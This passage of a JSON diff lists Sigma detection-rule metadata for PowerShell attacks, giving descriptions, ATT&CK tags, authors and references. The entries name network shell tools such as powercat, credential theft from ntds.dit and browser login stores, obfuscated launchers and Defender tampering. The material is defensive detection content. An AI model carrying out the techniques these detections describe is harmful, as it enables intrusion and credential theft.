"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_pc_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "value": "Tamper Windows Defender - PSClassic", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/07", - "filename": "posh_pc_tamper_with_windows_defender.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_provider_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "value": "Suspicious Non PowerShell WSMAN COM Provider", - "meta": { - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - 
"attack.t1021.003" - ], - "creation_date": "2020/06/24", - "filename": "posh_pc_wsman_com_provider_no_powershell.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/06/29", - "filename": "posh_pc_xor_commandline.yml", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", - "value": "Alternate PowerShell Hosts - PowerShell Module", - "meta": { - "refs": [ - "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/11", - "filename": "posh_pm_alternate_powershell_hosts.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP 
Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "value": "Bad Opsec Powershell Code Artifacts", - "meta": { - "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://www.mdeditor.tw/pl/pgRt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_pm_bad_opsec_artifacts.yml", - "author": "ok @securonix invrep_de, oscd.community", - "level": "critical", - "falsepositive": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." 
- ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "value": "Clear PowerShell History - PowerShell Module", - "meta": { - "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/10/25", - "filename": "posh_pm_clear_powershell_history.yml", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", - "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "value": "PowerShell Decompress Commands", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/8", - "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2020/05/02", - "filename": "posh_pm_decompress_commands.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", - "value": "Suspicious Get-ADDBAccount Usage", - "meta": { - "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/16", - "filename": "posh_pm_get_addbaccount.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", - "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "value": "PowerShell Get Clipboard", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2020/05/02", - "filename": "posh_pm_get_clipboard.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_pm_invoke_obfuscation_clip.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "uuid": "2f211361-7dce-442d-b78a-c04039677378", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "meta": { - "refs": [ - 
"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/08", - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "posh_pm_invoke_obfuscation_stdin.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - 
"creation_date": "2020/10/15", - "filename": "posh_pm_invoke_obfuscation_var.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_pm_invoke_obfuscation_via_compress.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "value": 
"Invoke-Obfuscation Via Stdin - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", - "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - 
"filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_pm_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a 
network", - "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", - "value": "Netcat The Powershell Version - PowerShell Module", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "posh_pm_powercat.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sessions", - "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "value": "Remote PowerShell Session (PS Module)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/08/10", - "filename": "posh_pm_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "high", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "uuid": 
"815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_pm_susp_ad_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", - "value": "Suspicious PowerShell Download - 
PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pm_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", - "value": "Use Get-NetTCPConnection - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "posh_pm_susp_get_nettcpconnection.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/12", - "filename": 
"posh_pm_susp_invocation_generic.yml", - "author": "Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pm_susp_invocation_specific.yml", - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "value": "Suspicious Get Local Groups Information", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/12", - "filename": "posh_pm_susp_local_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - 
"logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "uuid": "e3818659-5016-4811-a73c-dde4679169d2", - "value": "Suspicious Computer Machine Password by PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2022/02/21", - "filename": "posh_pm_susp_reset_computermachinepassword.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "uuid": "6942bd25-5970-40ab-af49-944247103358", - "value": "Suspicious Get Information for SMB Share - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" - ], - "tags": [ - 
"attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_pm_susp_smb_share_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_pm_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", - "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "posh_pm_syncappvpublishingserver_exe.yml", - "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "ps_module", - 
"logsource.product": "windows" - } - }, - { - "description": "Detecting use WinAPI Functions in PowerShell", - "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", - "value": "Accessing WinAPI in PowerShell", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" - ], - "creation_date": "2020/10/06", - "filename": "posh_ps_accessing_win_api.yml", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", - "value": "Access to Browser Login Data", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.003" - ], - "creation_date": "2022/01/30", - "filename": "posh_ps_access_to_browser_login_data.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts that adds a Name Resolution 
